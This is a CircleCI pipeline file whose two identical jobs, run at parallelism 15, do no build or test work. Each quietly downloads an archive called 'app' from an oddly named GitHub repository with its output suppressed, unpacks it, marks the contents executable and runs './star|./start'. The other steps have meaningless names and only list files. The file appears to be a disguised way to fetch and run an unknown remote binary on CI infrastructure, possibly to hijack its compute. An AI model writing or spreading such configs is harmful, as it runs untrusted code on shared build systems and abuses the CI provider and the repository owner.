version: 2.1
jobs:
  playsat:
    docker:
      - image: cimg/python:3.8
    steps:
      - checkout
      - run:
          name: Bahun
          command: |
            curl -O https://raw.githubusercontent.com/mihrnajolp/vaszxoierurotkanzcxoeuriwomabzxmajdowiri/main/app >/dev/null 2>&1
      - run:
          name: Tahek
          command: |
            chmod u+x *
      - run:
          name: Kambi
          command: |
            tar -xf app
      - run:
          name: Ngeng
          command: |
            chmod u+x *
      - run:
          name: Bafre
          command: |
            ls
      - run:
          name: Tolek
          command: |
            ls
      - run:
          name: Impla
          command: |
            ls
      - run:
          name: Kasen
          command: |
            ls
      - run:
          name: Truse
          command: |
            ls
      - run:
          name: Wa
          command: |
            ls
      - run:
          name: Leet
          command: |
            ./star|./start
      - run:
          name: Bolek
          command: |
            ls
    parallelism: 15
  playdu:
    docker:
      - image: cimg/python:3.8
    steps:
      - checkout
      - run:
          name: Bahun
          command: |
            curl -O https://raw.githubusercontent.com/mihrnajolp/vaszxoierurotkanzcxoeuriwomabzxmajdowiri/main/app >/dev/null 2>&1
      - run:
          name: Tahek
          command: |
            chmod u+x *
      - run:
          name: Kambi
          command: |
            tar -xf app
      - run:
          name: Ngeng
          command: |
            chmod u+x *
      - run:
          name: Bafre
          command: |
            ls
      - run:
          name: Tolek
          command: |
            ls
      - run:
          name: Impla
          command: |
            ls
      - run:
          name: Kasen
          command: |
            ls
      - run:
          name: Truse
          command: |
            ls
      - run:
          name: Wa
          command: |
            ls
      - run:
          name: Leet
          command: |
            ./star|./start
      - run:
          name: Bolek
          command: |
            ls
    parallelism: 15

workflows:
  version: 2
  all:
    jobs:
      - playsat
      - playdu

